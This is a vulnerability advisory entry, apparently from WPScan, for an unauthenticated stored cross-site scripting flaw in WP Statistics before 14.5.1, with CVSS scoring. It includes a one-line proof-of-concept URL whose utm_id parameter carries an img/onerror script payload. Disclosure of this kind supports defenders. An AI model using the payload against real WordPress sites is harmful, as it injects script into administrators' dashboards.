Lucene search

K
wpvulndbWpvulndbWPVDB-ID:56779EE5-5BF4-47D2-BBAF-B398EA926FBE
HistoryMar 13, 2024 - 12:00 a.m.

WP Statistics < 14.5.1 - Unauthenticated Stored Cross-Site Scripting

2024-03-1300:00:00
wpscan.com
26
wp statistics
cross-site scripting
unauthenticated
security vulnerability
plugin
dashboard
poc

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

EPSS

0

Percentile

9.0%

Description The plugin does not properly escape visited URLs which are reflected on the plugin’s dashboard.

PoC

Visit one same page multiple times so it makes it to the most visited pages, adding the following “utm_id” parameter to it: http://vulnerable-site.tld/attacked-page/?utm_id="><img%2Fsrc=x onerror%3Dalert(123)%2F%2F>

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

EPSS

0

Percentile

9.0%

Related for WPVDB-ID:56779EE5-5BF4-47D2-BBAF-B398EA926FBE